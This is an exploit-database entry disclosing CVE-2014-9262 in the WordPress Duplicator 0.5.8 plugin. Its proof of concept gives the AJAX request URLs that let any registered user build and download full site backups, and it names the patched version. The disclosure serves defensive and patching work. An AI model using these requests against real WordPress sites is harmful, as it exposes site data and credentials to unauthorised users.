Lucene search
Kacper Szurek1337DAY-ID-23304HistoryFeb 18, 2015 - 12:00 a.m.
WordPress Duplicator 0.5.8 Privilege Escalation Vulnerability
2015-02-1800:00:00
Kacper Szurek
0day.today
20
0.025 Low
EPSS
Percentile
90.2%
WordPress Duplicator plugin version 0.5.8 suffers from a backup related vulnerability that allows for privilege escalation.
# Exploit Title: Duplicator 0.5.8 Privilege Escalation
# Date: 21-11-2014
# Software Link: https://wordpress.org/plugins/duplicator/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# Category: webapps
# CVE: CVE-2014-9262
1. Description
Every registered user can create and download backup files.
File: duplicator\duplicator.php
add_action('wp_ajax_duplicator_package_scan', 'duplicator_package_scan');
add_action('wp_ajax_duplicator_package_build', 'duplicator_package_build');
add_action('wp_ajax_duplicator_package_delete', 'duplicator_package_delete');
add_action('wp_ajax_duplicator_package_report', 'duplicator_package_report');
http://security.szurek.pl/duplicator-058-privilege-escalation.html
2. Proof of Concept
Login as regular user (created using wp-login.php?action=register) then start scan:
http://wordpress-url/wp-admin/admin-ajax.php?action=duplicator_package_scan
After that you can build backup:
http://wordpress-url/wp-admin/admin-ajax.php?action=duplicator_package_build
This function will return json with backup name inside File key.
You can download backup using:
http://wordpress-url/wp-snapshots/%file_name_from_json%
3. Solution:
Update to version 0.5.10
# 0day.today [2018-01-04] #Related
prion
prion
Design/Logic Flaw
2017-08-07 17:29:00
cvelist
cvelist
CVE-2014-9262
2017-08-07 17:00:00
cve
cve
CVE-2014-9262
2017-08-07 17:29:00
wpvulndb
wpvulndb
Duplicator 0.5.8 - Privilege Escalation
2015-02-19 00:00:00
nvd
nvd
CVE-2014-9262
2017-08-07 17:29:00